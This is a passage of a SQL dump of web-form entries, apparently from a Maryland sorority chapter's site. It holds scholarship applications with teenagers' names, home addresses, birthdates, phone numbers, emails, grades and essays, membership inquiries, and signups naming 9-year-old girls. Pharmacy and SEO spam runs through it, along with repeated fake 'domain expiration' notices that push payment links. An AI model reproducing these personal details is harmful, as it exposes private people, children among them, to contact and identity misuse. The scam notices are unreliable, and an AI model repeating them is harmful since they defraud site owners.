\r\n-'),(5092,412,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Scholarship-Essay-B.docx'),(5093,412,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Jackson-L-transcript-2.pdf'),(5094,412,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Release-Form.pdf'),(5095,413,6,18.3,'Roshnee'),(5096,413,6,18.6,'Roberts'),(5097,413,6,19.1,'5764 Stevens Forest Road'),(5098,413,6,19.2,'Apt 419'),(5099,413,6,19.3,'Columbia'),(5100,413,6,19.4,'Maryland'),(5101,413,6,19.5,'21045'),(5102,413,6,19.6,'United States'),(5103,413,6,4,'09-15-01'),(5104,413,6,21,'roshneelrob@gmail.com'),(5105,413,6,20,'(443) 820-6587'),(5106,413,6,10,'Oakland Mills High School'),(5107,413,6,27,'Other'),(5108,413,6,28,'I found this scholarship during my scholarship search in preparation for senior year.'),(5109,413,6,9,'3.67'),(5110,413,6,26,'Biology/Pre-Med'),(5111,413,6,12,'NA'),(5112,413,6,14,'National Honors Society- 2 years; Vice President\r\nStudent Government Association- 2 years; Appointed Officer (11) & Corresponding Secretary of Executive Board (12)\r\nTri-M- 1 year\r\nDelta Scholars- 3 years\r\nDECA/FBLA- 2 years; Student Leader'),(5113,413,6,13,'Gold Honor Roll (9, 10, 11, 12)\r\nAP Scholar Award (12)\r\nParticipation Certificate for Howard County Brain Bee (12)\r\nShort Skills Seminar Award (11)\r\nChampions of Courage Award (11)\r\nNational Honors Society Certificate (11)\r\nScholar Athlete Award (9, 10, 12)\r\nCertificate of Achievement from the Council of Elders of the Black Community (9)\r\nComplete Plan for Columbia Association Points Program (10, 11, 12)\r\nCertificate of Academic Achievement: Delta Scholars (10)'),(5114,413,6,36,'Veterans Recognition Night- National Honors Society; August- October 2019\r\nAlpha Achievers Thanksgiving Dinner- Alpha Achievers; November 2017, 2018, 2019\r\nOMHS Food Pantry- Oakland Mills High School; during  11th and 12th grade\r\nThanksgiving Week (hosting occupants from Grassroots Homeless Shelter during week of Thanksgiving)- Atholton SDA Church; November 2014, 2015, 2016, 2017, 2018, 2019\r\nHomecoming Carnival- OMHS Student Government Association; October 2019\r\nMLK Service Day- Columbia Association; January 2019\r\nSunrise Nursing Home (singing and playing music for the elderly)- Atholton SDA Pathfinders; 2013-2019 (two Saturdays a month)'),(5115,413,6,37,'University of Maryland, Baltimore County\r\nTowson University\r\nUniversity of Maryland, College Park'),(5116,413,6,41,'When I was younger, my mom used to work at a hospital which led me to spending a lot of time there. Whenever there was an emergency I would be one of the first at the door when the ambulance returned to the hospital. I have always been fascinated by the workings of the body and curious to see how it could be fixed. I have also been interested in helping people for as long as I can remember. Getting to learn about the body and how to fix it is a key component of life. That knowledge will allow me to use my skills and gifts to take care of anyone that I can which has always been my goal. Beyond working in a hospital or in a clinic, I will be able to use my skills in the real world. Living in a single parent household with no insurance, my mom could not afford for any of her children to be ill because she would not have a way to pay for any medical bills. I would especially like to help such families because not only can I empathize, but I believe that people, especially children, should not be in situations in which they do not have the ability to take care of themselves when they are sick. Lastly, I believe that I will thoroughly enjoy everything I learn because it all brings me one step closer to my goal of aiding anyone in need.\r\nI strongly believe that in college, I will get the opportunity to explore my interests while learning new skills, meeting new people, and figuring out who I am. I have heard so much about college being that transformative stage of your life in which it is probably the most trying, but you are in a place in which you are getting to learn and grow, but you also do not have all of the pressures of the real world. A college, especially if you have found the right one, will offer its students the opportunity to have a more “well-rounded” education. This means that even though a student may choose to major in science, they also have the opportunity to discover topics dealing with the humanities. This allows students, like me, to explore my interests and others in order to figure out what it is that I will actually enjoy. In college, I do not think that I will feel “stuck” with the major I have chosen because college nowadays make it easy for students to switch if they feel the need to. This will also allow more of an ability to explore any and all of my interests.'),(5117,413,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/OFFICIAL-1.pdf'),(5118,413,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/LGZScholarshipReleaseForm1.pdf'),(5119,413,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/Photo1.pdf'),(5120,414,6,18.3,'John Lee'),(5121,414,6,18.6,'Smithson V'),(5122,414,6,19.1,'8309 Stairtop Court'),(5123,414,6,19.3,'Columbia'),(5124,414,6,19.4,'MD'),(5125,414,6,19.5,'21045'),(5126,414,6,19.6,'United States'),(5127,414,6,4,'02-07-02'),(5128,414,6,21,'jlsv42@gmail.com'),(5129,414,6,20,'(443) 506-4980'),(5130,414,6,10,'Long Reach High School'),(5131,414,6,27,'School Counselor/Advisor'),(5132,414,6,28,'NA'),(5133,414,6,9,'3.0'),(5134,414,6,26,'Marketing'),(5135,414,6,12,'NA'),(5136,414,6,14,'Long Reach High School National Honor Society- 1 year- Member\r\nLong Reach High School Alpha Achievers- 3 years- Member\r\nLong Reach High School Marching Band- 4 years- Member'),(5137,414,6,13,'Long Reach High School Quarterly Honor Roll- 2016-2020'),(5138,414,6,36,'Columbia Community Church Children\'s Church Assistant- 2013-2020 (present)\r\nColumbia Community Church Cold Weather Shelter Volunteer- February 2016, 2017, 2018\r\nWaterloo Elementary School Annual Carnival Volunteer- March, 2018\r\nElkridge Horizon Foundation Thanksgiving Day Volunteer- 2017, 2018, 2019\r\nHorizon Foundation Open Streets Volunteer- October, 2017'),(5139,414,6,37,'North Carolina A&T State University\r\nRowan University\r\nLincoln University'),(5140,414,6,40,'If I was on the game show, ‘Jeopardy,’ the category that I would choose would be my favorite show of all time, Dragon Ball Z.  I can remember loving this show, ever since I was a kid. I would wake up every Saturday morning, and watch the new episode that aired on Nickelodeon. Soon I knew everything about the show. I would even watch YouTube videos that explained things that didn’t happen in the show, in order to get a deeper understanding of the show. To this day, I still know everything about the Dragon Ball Z, and I continue to watch all of the new series that they have made. I know more about this show than any of my friends who watch it. \r\n\r\nPeople always wonder why I love Dragon Ball Z so much. Dragon Ball Z was the first show that truly excited me.  My friends and I would watch the show, and then talk about how great the new episodes were. The fight scenes were amazing, and all the hardships that the characters went through made me feel like if I pushed myself I could overcome any obstacle that came into my own life.  I feel this is the biggest reason why I love the show so much. When Goku, the main character, was fighting one of his enemies, he was losing really badly. It seemed like he wasn’t going to win this battle because he had just gotten out of another battle right before this one. All of a sudden his enemy killed his best friend, but Goku pushed past his limits and was able to become the legendary super Saiyan. Ever since the day Goku was able to do that, I always pushed myself to do more and to “go beyond my limits.” \r\n\r\nNote- Please note that my application is being submitted after the deadline.  I tried to submit it prior to the deadline on March 26th, but the website was suspended.  I tried to reach out using the email that was listed on the suspended pages, but the email bounced back to me (I can forward the email to you for verification, if needed).  I hope that you accept my application, due to the technical issues that I faced. Thank you for your consideration.'),(5141,414,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/SmithsonTranscript.pdf'),(5142,414,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/SmithsonPhotoRelease.pdf'),(5143,414,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2020/03/SmithsonPhoto.pdf'),(5144,415,10,1.3,'GeneralСontractorfeelp'),(5145,415,10,1.6,'GeneralСontractorfeelpIM'),(5146,415,10,3,'justinwood2150@yandex.com'),(5147,415,10,5,'(630) 621-4333'),(5148,415,10,2,'Interested in Membership'),(5149,415,10,4,'<b><a href=https://grandeurhillsgroup.com/>high end renovation nyc</a></b> \r\n \r\nRepair work  residential premises turnkey -  much better Solving problems through wizards.In order  place an order for  repair work  dwellings in Diamond District, leave a request on site or by phone. To  create hospitality  interior decoration expertly  as well as  properly, it  is vital to  utilize effective  and also  extremely  audio  products that comply with all  standards and technological  criteria.  However the  primary  distinction is not  also in the  components, but in how and  just how correctly they  are actually  made use of. And also this  is actually the work of the  experts.  Expert  capabilities  areactually an extremely  essential  situation. .  Likewise in our  firm, you can  purchase  personalized bathroom vanities, retail interior design on  the most effective problems. With us, interior basements,  in addition to  Premium renovation Bay Terrace, will  end up being  straightforward,  high quality and also  quickly.  Our representative will call you back,  for clarification  few details and assign Times of Day  arrival to you  professionals and  designer.'),(5150,416,10,1.3,'Matthewdazit'),(5151,416,10,1.6,'MatthewdazitDY'),(5152,416,10,3,'novostroyka63@lakidsbed.com'),(5153,416,10,5,'(065) 455-7477'),(5154,416,10,2,'Interested in Membership'),(5155,416,10,4,'<b><a href=https://novostroyka63.ru/>Монолитный фундамент цена</a></b> \r\n \r\nСоздание дома вашей мечты - это оригинальная возможность, спланировать и претворить в жизнь нечто воистину уникальное во всех отношениях.   Возведение фундамента - это в целом первоначальная модель ремонта, в процессе которой домик строится. При расчете замена фундамента под старым деревянным домом цена предусматривается весьма много факторов.  Средняясумма возведения домов фундамента составляет приблизительно от 10$ за кв.метр . Погреб сможет умножить итоговую стоимость каждого объекта недвижимости, предоставляя необходимое помещение ради организации хранения и порой рабочее пространство.  Наша профессиональная команда по конструированию и возведенью фундамент под памятник на кладбище цена может помочь выстроить жилище, о котором вы всегда мечтали. От начала до конца  наша специализированная компания в  Череповец позаботимся о всех без исключения процессах, чтобы заказчику не довелось тревожиться о деталях. Специализированная международная компания в Киселевск  несет юридическую ответственность за проект, а не вы, именно поэтому организация в Борисоглебск имеют интерес в том, затем чтобы довести до конца строительство коттеджа быстрее и эффективнее. Узнайте о сваи винтовые для фундамента цены в вытегре у спспециалистовециалистов корпорации.'),(5156,417,10,1.3,'Imani'),(5157,417,10,1.6,'Charles'),(5158,417,10,3,'Imanin.charles@yahoo.com'),(5159,417,10,5,'(410) 428-6038'),(5160,417,10,2,'Interested in Membership'),(5161,417,10,4,'Greetings,\r\n\r\nI had a few questions about membership that you can hopefully answer for me when you have to chance. Please contact me as soon as possible'),(5162,418,10,1.3,'Cassandra'),(5163,418,10,1.6,'Belton'),(5164,418,10,3,'crbelton2@gmail.com'),(5165,418,10,5,'(347) 261-2326'),(5166,418,10,2,'Inactive Member (Reclaim)'),(5167,418,10,4,'Greetings, \r\nMy name is Cassandra Belton and I reside in Howard Co.\r\nI have been inactive for several years. \r\nIs it possible to reclaim virtually?\r\nThank you\r\nCassandra Belton'),(5168,419,10,1.3,'Anjanette'),(5169,419,10,1.6,'Jones'),(5170,419,10,3,'anjanette0983@gmail.com'),(5171,419,10,5,'(240) 462-2506'),(5172,419,10,2,'Interested in Membership'),(5173,419,10,4,'Good Afternoon,\r\nI highly interested in pursing membership into your prestigious organization and would like to inquire about your process. I am a Registered Nurse who works as a Director of Nursing. I am familiar with community service, as I have done so as an Eastern Star. I hope to hear from you soon.'),(5174,420,7,1.3,'Alynda'),(5175,420,7,1.6,'Greene'),(5176,420,7,2,'Anjanette0983@gmail.com'),(5177,420,7,3,'Amicette Club'),(5178,420,7,4,'I would love to my daughter involved in this program so that she can be mentored along her path. She is 9 years old and turning 10 in September. My name is Anjanette Jones and I am Alynda\'s mother. I look forward to hearing from you'),(5179,421,10,1.3,'3aplus63Jek'),(5180,421,10,1.6,'3aplus63JekLP'),(5181,421,10,3,'sam@3aplus63.ru'),(5182,421,10,5,'(726) 136-6660'),(5183,421,10,2,'Interested in Membership'),(5184,421,10,4,'<b><a href=https://3aplus63.ru/product-category/gajkoverty/>пневматические гайковерты</a></b> \r\n \r\nСозданная нами предприятие Новочеркасск - сегодня это ведущий поставщик\r\nпромышленного оборудования. \r\n Можно купить в Каменск-Уральскийнемало решений для такелажного и подъемного, промышленного и складского, а также весового и гидравлического промышленного оборудования, в том числе тали ручные рычажные,тали ручные червячные передвижные взрывобезопасные,домкраты гидравлические телескопические,канаты для лебедок mtm,балки концевые подвесные,тележки гидравлические с электропередвижением,тележки для балок подвесных концевых холостые,весы крановые электронные. \r\n Мы являемся производителем непростых решений для индустриального парка оборудования. \r\n Мы высококлассная организация по выпуску промышленного оснащения с более чем 6-летним навыком работы.\r\n Интернет магазин грузоподъемного парка оборудования выходит за пределы интернет-реализации и товаров по дисконтной цене, наша фирма может оказать консультации и дополнительно предоставить специализированные услуги на заказ.\r\n На вебсайте мы стремимся предоставить нашим клиентам \"универсальный он-лайн магазин\" в пользу всех ваших надобностей в промышленном и складском оборудование. Мы стремимся предоставить особо высококонкурентные стоимость товаров в индустрии, оптимизируя при этом превосходнейшее обслуживание покупателей.'),(5185,422,10,1.3,'labedroomNable'),(5186,422,10,1.6,'labedroomNableBS'),(5187,422,10,3,'i8lediab@renovation-manhattan.com'),(5188,422,10,5,'(812) 582-3472'),(5189,422,10,2,'Interested in Membership'),(5190,422,10,4,'<b><a href=https://labedroom.com/>Bedroom ideas</a></b> \r\nCome in  outstanding store in Jefferson Park production for  office and  home use and  cafe!    presents   over  12000  appointment furniture    and goods  for a country house and apartments  or  restaurant. Natural rattan , are used   for the purposes of production   our branded products , possesses  strength  and  wear resistance, wonderful  external data. All furniture processed special compounds, due to which their surface does not absorb  water,  stable to extremes  ambient temperature air and exposure of the sun.  Vya our furniture  excellent retains its  functions even in  restaurant in  open spaces .  In the presented  online catalog  you  offered  photos  furniture  for dining room, hall, bedroom, children\'s room , as well as intended  for organization of storage area  -  dressers and cabinets, cabinets and  others .  In our store in Fairfax you can buy  everything for  any your home  not expensive . We invite   client   come to   store ,  holding   in  Westwood   what  cares about  its  shopper.'),(5191,423,7,1.3,'п»їcialis'),(5192,423,7,1.6,'entettedogm'),(5193,423,7,2,'entettedo@parkll.xyz'),(5194,423,7,3,'Both'),(5195,423,7,4,'Trusted Online Pharmacy Cialis  Bruima https://acialisd.com/# - Cialis noistGesseli busco viagra  Oreprepuct <a href=https://acialisd.com/#>cialis 20mg price at walmart</a> wrarammeft Kamagra 100 Mg Montpellier'),(5196,424,10,1.3,'Kristin'),(5197,424,10,1.6,'Adams'),(5198,424,10,3,'Kristin2012@gmail.com'),(5199,424,10,5,'(301) 535-4160'),(5200,424,10,2,'Current Active Member (Transfer)'),(5201,424,10,4,'Good Afternoon Soror, \r\n   I am currently financial in SPZ but looking to transfer to a new chapter. I know it’s tough to get a feel for the chapter and vice verse because of the times we are in now, but I’ve seen some of the things you all have done. Have a terrific day!'),(5202,425,10,1.3,'п»їcialis'),(5203,425,10,1.6,'elersecagGy'),(5204,425,10,3,'LEDODONNA@aqmail.xyz'),(5205,425,10,5,'(727) 215-1101'),(5206,425,10,2,'Interested in Membership'),(5207,425,10,4,'Propecia Online America  Bruima https://acialisd.com/# - Cialis noistGesseli Propecia Hsa Propecia  Oreprepuct <a href=https://acialisd.com/#>Cialis</a> wrarammeft Buy 5mg Cialis From Canada'),(5208,426,10,1.3,'buy cialis online uk'),(5209,426,10,1.6,'cialis reviewsUP'),(5210,426,10,3,'LEDODONNA@aqmail.xyz'),(5211,426,10,5,'(660) 815-8465'),(5212,426,10,2,'Interested in Membership'),(5213,426,10,4,'Zithromax Acne Treatment  GagImpom https://ascialis.com/ - Cialis weeday cialis generique angleterre  DymnDeerimon <a href=https://ascialis.com/#>cialis without prescription</a> interogent Buy Viagra With Paypal Account'),(5214,427,10,1.3,'Serrita'),(5215,427,10,1.6,'Hill'),(5216,427,10,3,'Serritalhill928@gmail.com'),(5217,427,10,5,'(202) 246-4663'),(5218,427,10,2,'Current Active Member (Transfer)'),(5219,428,10,1.3,'Serrita'),(5220,428,10,1.6,'Hill'),(5221,428,10,3,'Serritalhill928@gmail.com'),(5222,428,10,5,'(202) 246-4663'),(5223,428,10,2,'Current Active Member (Transfer)'),(5224,429,10,1.3,'Juliette'),(5225,429,10,1.6,'Dixon'),(5226,429,10,3,'svuten@gmail.com'),(5227,429,10,5,'(305) 985-9145'),(5228,429,10,2,'Current Active Member (Transfer)'),(5229,429,10,4,'Good afternoon,\r\nMy family and I relocated to Howard County from Miami Florida in March of this year. I would love to know more about the area and some of the work ZPB  is doing. It is my intention to unite with Sorors and be active as I was in the Miami graduate chapter. \r\nI became a member of Zeta Phi Beta Sorority during my undergraduate year of 2005.'),(5230,430,10,1.3,'Shayla'),(5231,430,10,1.6,'Honablew'),(5232,430,10,3,'semiller1153@gmail.com'),(5233,430,10,5,'(443) 929-0953'),(5234,430,10,2,'Interested in Membership'),(5235,431,10,1.3,'Kyra'),(5236,431,10,1.6,'Hemphill'),(5237,431,10,3,'hemphill83@hotmail.com'),(5238,431,10,5,'(410) 570-5656'),(5239,431,10,2,'Interested in Membership'),(5240,431,10,4,'Thank you for the opportunity and your consideration.'),(5241,432,7,1.3,'cialis tadalafil'),(5242,432,7,1.6,'RosyhoachVS'),(5243,432,7,2,'Fepseinna@afmail.xyz'),(5244,432,7,3,'Archonette Club'),(5245,432,7,4,'Canadna Drugs  GagImpom https://artsocialist.com/ - where can i buy cialis on line weeday Viagra Cheap Prices  DymnDeerimon <a href=https://artsocialist.com/#>cheap cialis</a> interogent cialis viagra'),(5246,433,10,1.3,'Juliana'),(5247,433,10,1.6,'Buadu'),(5248,433,10,3,'jrbuadu@icloud.com'),(5249,433,10,5,'(240) 863-7853'),(5250,433,10,2,'Interested in Membership'),(5251,433,10,4,'I won’t graduate till August 2021. I currently obtaining my BA in criminal justice.'),(5252,434,10,1.3,'Juliana'),(5253,434,10,1.6,'Buadu'),(5254,434,10,3,'jrbuadu@icloud.com'),(5255,434,10,5,'(240) 863-7853'),(5256,434,10,2,'Interested in Membership'),(5257,434,10,4,'I won’t graduate till August 2021. I currently obtaining my BA in criminal justice.'),(5258,435,10,1.3,'buy cialis online cheap'),(5259,435,10,1.6,'GrooriouPjo'),(5260,435,10,3,'updably@aemail.xyz'),(5261,435,10,5,'(776) 016-0575'),(5262,435,10,2,'Interested in Membership'),(5263,435,10,4,'Cephalexin Drug Class  GagImpom https://cialisse.com/ - cialis prices weeday Comprare Viagra Online  DymnDeerimon <a href=https://cialisse.com/#>Cialis</a> interogent brand cialis buy online'),(5264,436,10,1.3,'Joe'),(5265,436,10,1.6,'Miller'),(5266,436,10,3,'info@domainworld.com'),(5267,436,10,5,'(125) 485-9342'),(5268,436,10,2,'Inactive Member (Reclaim)'),(5269,436,10,4,'IMPORTANCE NOTICE\r\n\r\nNotice#: 491343\r\nDate: 2020-09-16    \r\n\r\nExpiration message of your zphiblgz.org\r\n\r\nEXPIRATION NOTIFICATION\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: https://gomydomains.com/?n=zphiblgz.org&r=a&t=1600160213&p=v1\r\n\r\nThis purchase expiration notification zphiblgz.org advises you about the submission expiration of domain zphiblgz.org for your e-book submission. \r\nThe information in this purchase expiration notification zphiblgz.org may contains CONFIDENTIAL AND/OR LEGALLY PRIVILEGED INFORMATION from the processing department from the processing department to purchase our e-book submission. NON-COMPLETION of your submission by the given expiration date may result in CANCELLATION of the purchase.\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: https://gomydomains.com/?n=zphiblgz.org&r=a&t=1600160213&p=v1\r\n\r\nACT IMMEDIATELY. The submission notification zphiblgz.org for your e-book will EXPIRE WITHIN 2 DAYS after reception of this email\r\n\r\nThis notification is intended only for the use of the individual(s) having received this message. \r\n\r\nPLEASE CLICK ON SECURE ONLINE PAYMENT TO COMPLETE YOUR PAYMENT\r\n\r\nSECURE ONLINE PAYMENT: https://gomydomains.com/?n=zphiblgz.org&r=a&t=1600160213&p=v1\r\n\r\nNon-completion of your submission by given expiration date may result in cancellation.\r\n\r\nAll online services will be restored automatically upon confirmation of payment. Delivery will be completed within 24 hours. \r\n\r\nCLICK UNDERNEATH FOR IMMEDIATE PAYMENT:\r\n\r\nSECURE ONLINE PAYMENT: https://gomydomains.com/?n=zphiblgz.org&r=a&t=1600160213&p=v1'),(5270,437,10,1.3,'J. Pepsie'),(5271,437,10,1.6,'Michel'),(5272,437,10,3,'jpepsiemichel@gmail.com'),(5273,437,10,5,'(954) 816-3344'),(5274,437,10,2,'Current Active Member (Transfer)'),(5275,437,10,4,'Hello Sorors,\r\nI am interested in finding out more information about your chapter. I look forward to hearing from you.\r\n\r\nSisterly,\r\nSoror J. Pepsie Michel'),(5276,438,10,1.3,'cheap cialis'),(5277,438,10,1.6,'GrooriouPjo'),(5278,438,10,3,'updably@aemail.xyz'),(5279,438,10,5,'(275) 812-1484'),(5280,438,10,2,'Interested in Membership'),(5281,438,10,4,'Universaldrugservices  GagImpom https://artsocialist.com/ - buy cialis online with prescription weeday Calcolo Levitra  DymnDeerimon <a href=https://artsocialist.com/#>Cialis</a> interogent Baclofene Atoute'),(5282,439,10,1.3,'Joe'),(5283,439,10,1.6,'Miller'),(5284,439,10,3,'info@domainworld.com'),(5285,439,10,5,'(125) 485-9342'),(5286,439,10,2,'Inactive Member (Reclaim)'),(5287,439,10,4,'IMPORTANCE NOTICE\r\n\r\nNotice#: 491343\r\nDate: 2020-10-02    \r\n\r\nExpiration message of your zphiblgz.org\r\n\r\nEXPIRATION NOTIFICATION\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://domainsafer.com/?n=zphiblgz.org&r=a&t=1601587912&p=v1\r\n\r\nThis purchase expiration notification zphiblgz.org advises you about the submission expiration of domain zphiblgz.org for your e-book submission. \r\nThe information in this purchase expiration notification zphiblgz.org may contains CONFIDENTIAL AND/OR LEGALLY PRIVILEGED INFORMATION from the processing department from the processing department to purchase our e-book submission. NON-COMPLETION of your submission by the given expiration date may result in CANCELLATION of the purchase.\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://domainsafer.com/?n=zphiblgz.org&r=a&t=1601587912&p=v1\r\n\r\nACT IMMEDIATELY. The submission notification zphiblgz.org for your e-book will EXPIRE WITHIN 2 DAYS after reception of this email\r\n\r\nThis notification is intended only for the use of the individual(s) having received this message. \r\n\r\nPLEASE CLICK ON SECURE ONLINE PAYMENT TO COMPLETE YOUR PAYMENT\r\n\r\nSECURE ONLINE PAYMENT: http://domainsafer.com/?n=zphiblgz.org&r=a&t=1601587912&p=v1\r\n\r\nNon-completion of your submission by given expiration date may result in cancellation.\r\n\r\nAll online services will be restored automatically upon confirmation of payment. Delivery will be completed within 24 hours. \r\n\r\nCLICK UNDERNEATH FOR IMMEDIATE PAYMENT:\r\n\r\nSECURE ONLINE PAYMENT: http://domainsafer.com/?n=zphiblgz.org&r=a&t=1601587912&p=v1'),(5288,440,10,1.3,'Rukia'),(5289,440,10,1.6,'Sesay'),(5290,440,10,3,'rukiasesay@gmail.com'),(5291,440,10,5,'(202) 809-5130'),(5292,440,10,2,'Interested in Membership'),(5293,440,10,4,'Hello\r\nMy name is Rukia and I am very interested in becoming a member of Zeta . I love everything this sorority represents. Please let me know when an informal interest meeting takes place or what next steps I should take. Thanks you and I look forward to future communication .\r\nWarm Regards'),(5294,441,10,1.3,'Joe'),(5295,441,10,1.6,'Miller'),(5296,441,10,3,'info@domainworld.com'),(5297,441,10,5,'(125) 485-9342'),(5298,441,10,2,'Interested in Membership'),(5299,441,10,4,'IMPORTANCE NOTICE\r\n\r\n\r\n\r\nNotice#: 491343\r\n\r\nDate: 2020-10-15    \r\n\r\n\r\n\r\nExpiration message of your zphiblgz.org\r\n\r\n\r\n\r\nEXPIRATION NOTIFICATION\r\n\r\n\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://gomydomains.site/?n=zphiblgz.org&r=a&t=1602726208&p=v1\r\n\r\n\r\n\r\nThis purchase expiration notification zphiblgz.org advises you about the submission expiration of domain zphiblgz.org for your e-book submission. \r\n\r\nThe information in this purchase expiration notification zphiblgz.org may contains CONFIDENTIAL AND/OR LEGALLY PRIVILEGED INFORMATION from the processing department from the processing department to purchase our e-book submission. NON-COMPLETION of your submission by the given expiration date may result in CANCELLATION of the purchase.\r\n\r\n\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://gomydomains.site/?n=zphiblgz.org&r=a&t=1602726208&p=v1\r\n\r\n\r\n\r\nACT IMMEDIATELY. The submission notification zphiblgz.org for your e-book will EXPIRE WITHIN 2 DAYS after reception of this email\r\n\r\n\r\n\r\nThis notification is intended only for the use of the individual(s) having received this message. \r\n\r\n\r\n\r\nPLEASE CLICK ON SECURE ONLINE PAYMENT TO COMPLETE YOUR PAYMENT\r\n\r\n\r\n\r\nSECURE ONLINE PAYMENT: http://gomydomains.site/?n=zphiblgz.org&r=a&t=1602726208&p=v1\r\n\r\n\r\n\r\nNon-completion of your submission by given expiration date may result in cancellation.\r\n\r\n\r\n\r\nAll online services will be restored automatically upon confirmation of payment. Delivery will be completed within 24 hours. \r\n\r\n\r\n\r\nCLICK UNDERNEATH FOR IMMEDIATE PAYMENT:\r\n\r\n\r\n\r\nSECURE ONLINE PAYMENT: http://gomydomains.site/?n=zphiblgz.org&r=a&t=1602726208&p=v1'),(5300,442,10,1.3,'Joe'),(5301,442,10,1.6,'Miller'),(5302,442,10,3,'info@domainworld.com'),(5303,442,10,5,'(125) 485-9342'),(5304,442,10,2,'Inactive Member (Reclaim)'),(5305,442,10,4,'IMPORTANCE NOTICE\r\n\r\n\r\n\r\nNotice#: 491343\r\n\r\nDate: 2020-11-01    \r\n\r\n\r\n\r\nExpiration message of your zphiblgz.org\r\n\r\n\r\n\r\nEXPIRATION NOTIFICATION\r\n\r\n\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://godomainapplicable.site/?n=zphiblgz.org&r=a&t=1604190474&p=v1\r\n\r\n\r\n\r\nThis purchase expiration notification zphiblgz.org advises you about the submission expiration of domain zphiblgz.org for your e-book submission. \r\n\r\nThe information in this purchase expiration notification zphiblgz.org may contains CONFIDENTIAL AND/OR LEGALLY PRIVILEGED INFORMATION from the processing department from the processing department to purchase our e-book submission. NON-COMPLETION of your submission by the given expiration date may result in CANCELLATION of the purchase.\r\n\r\n\r\n\r\nCLICK HERE FOR SECURE ONLINE PAYMENT: http://godomainapplicable.site/?n=zphiblgz.org&r=a&t=1604190474&p=v1\r\n\r\n\r\n\r\nACT IMMEDIATELY. The submission notification zphiblgz.org for your e-book will EXPIRE WITHIN 2 DAYS after reception of this email\r\n\r\n\r\n\r\nThis notification is intended only for the use of the individual(s) having received this message. \r\n\r\n\r\n\r\nPLEASE CLICK ON SECURE ONLINE PAYMENT TO COMPLETE YOUR PAYMENT\r\n\r\n\r\n\r\nSECURE ONLINE PAYMENT: http://godomainapplicable.site/?n=zphiblgz.org&r=a&t=1604190474&p=v1\r\n\r\n\r\n\r\nNon-completion of your submission by given expiration date may result in cancellation.\r\n\r\n\r\n\r\nAll online services will be restored automatically upon confirmation of payment. Delivery will be completed within 24 hours. \r\n\r\n\r\n\r\nCLICK UNDERNEATH FOR IMMEDIATE PAYMENT:\r\n\r\n\r\n\r\nSECURE ONLINE PAYMENT: http://godomainapplicable.site/?n=zphiblgz.org&r=a&t=1604190474&p=v1'),(5306,443,10,1.3,'Kamilah'),(5307,443,10,1.6,'Zischang'),(5308,443,10,3,'kzischang@gmail.com'),(5309,443,10,5,'(512) 584-5086'),(5310,443,10,2,'Inactive Member (Reclaim)'),(5311,443,10,4,'Hello,\r\nI have been inactive for quite a few years and would like to look into becoming more active.  Thank you for your time.\r\n\r\nregards,\r\nKamilah'),(5312,444,10,1.3,'Briana'),(5313,444,10,1.6,'Green'),(5314,444,10,3,'bgreen0878@yahoo.com'),(5315,444,10,5,'(646) 744-5177'),(5316,444,10,2,'Current Active Member (Transfer)'),(5317,444,10,4,'Greetings Sorors of Lambda Gamma Zeta Chapter, \r\n\r\nI, Soror Briana Green, am an active member of our fine sorority through our Graduate Chapter, Delta Mu Zeta located in Manhattan (Harlem). I am reaching out because I recently moved to Howard County, Maryland. I would like to introduce myself,  work, and support our Sorority through helping locally with Lambda Gamma Zeta. I look forward to speaking with you all. \r\n\r\nSisterly, \r\n\r\nSoror Briana A. Green \r\n(646) 744-5177'),(5318,445,10,1.3,'Taylor'),(5319,445,10,1.6,'Green'),(5320,445,10,3,'shantav4@aol.com'),(5321,445,10,5,'(443) 554-1078'),(5322,445,10,2,'Interested in Membership'),(5323,445,10,4,'I am Shantavia Green, and I am interested in my daughter Taylor Green being apart of your sisterhood for little girls. Taylor is 9 years older.  And I am interested in joining as well. I will be graduating from ST. Mary\'s College of Maryland in May of 2021.  I want to connect with the sisterhood with ZETA PHI BETA.'),(5324,446,7,1.3,'Taylor'),(5325,446,7,1.6,'Green'),(5326,446,7,2,'shantav4@aol.com'),(5327,446,7,3,'Amicette Club'),(5328,446,7,4,'Taylor is 9 years older and is interested in learning about Black culture, social structure, and the sisterhood. She is in the fourth grade and is an honor roll student.'),(5329,447,7,1.3,'Taylor'),(5330,447,7,1.6,'Green'),(5331,447,7,2,'shantav4@aol.com'),(5332,447,7,3,'Amicette Club'),(5333,447,7,4,'Taylor is 9 years older and is interested in learning about Black culture, social structure, and the sisterhood. She is in the fourth grade and is an honor roll student.'),(5334,448,10,1.3,'Victoria'),(5335,448,10,1.6,'Morrison'),(5336,448,10,3,'intimatefete@gmail.com'),(5337,448,10,5,'(240) 508-9111'),(5338,448,10,2,'Interested in Membership'),(5339,448,10,4,'Hello! I hope this message finds everyone well.\r\n\r\nI’m interested in information on becoming a member. I believe in sisterhood and I am committed to making my community a better place for all, especially our children.\r\n\r\nI’d love the opportunity to discuss my background along with why I am interested in joining your chapter, further.\r\n\r\nThank you in advance for your time.'),(5340,449,10,1.3,'Joe'),(5341,449,10,1.6,'Miller'),(5342,449,10,3,'info@domainworld.com'),(5343,449,10,5,'(125) 485-9342'),(5344,449,10,2,'Interested in 